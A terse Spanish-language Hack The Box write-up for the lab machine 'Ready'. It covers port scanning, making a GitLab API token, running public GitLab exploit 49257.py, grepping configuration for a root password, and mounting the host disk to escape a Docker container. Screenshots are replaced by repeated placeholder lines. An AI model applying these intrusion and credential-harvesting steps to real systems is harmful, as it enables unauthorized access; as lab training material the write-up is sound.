Ready

Ready


HTB Linux

nmap -A -p- -oA output ## 10.129.205.129 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA ready 10.129.205.129

nmap -sU -O -p- -oA ready-udp 10.129.205.129

nikto -h 10.129.205.129:80

ssh_command.

Vemos el puerto 22 y 5080 estan abiertos.

Nos vamos a la pagina http://10.129.205.129:5080 y nos registramos

ssh_command.

whatweb http://10.129.205.129:5080

ssh_command.

Nos registramos como un usuario nuevo

ssh_command.

Vamos a ajustes y despues Access Tokens. Habilitamos el checkbox de api.

ssh_command.

Vemos el nuevo Access Token.

ssh_command.

curl -s -X GET http://10.129.205.129:5080/api/v4/version” -H “PRIVATE-TOKEN: NuLqEr5GZ1-WL65sALq2” | jq

ssh_command.

searchsploit gitlab 11.4.7

ssh_command.

searchsploit -m 49257.py

ssh_command.

Cambiamos los atributos adecuados para que funcione el script

python3 49257.py

ssh_command.

cd dude

ssh_command.

sudo -l

find -perm -4000 2>/dev/null

ssh_command.

cd opt

grep “sh$” /etc/passwd

ssh_command.

cat docker-compose.yml

ssh_command.

cat gitlab.rb | grep “pass”

ssh_command.

su root

Introducimos la contrasena encontrada en la imagen anterior

ssh_command.

fdisk -l

ssh_command.

mkdir /mnt/mounted

mount /dev/sda2 mnt/mounted/

cd /mnt/mounted

ssh_command.

© 2025 Cu3rv0x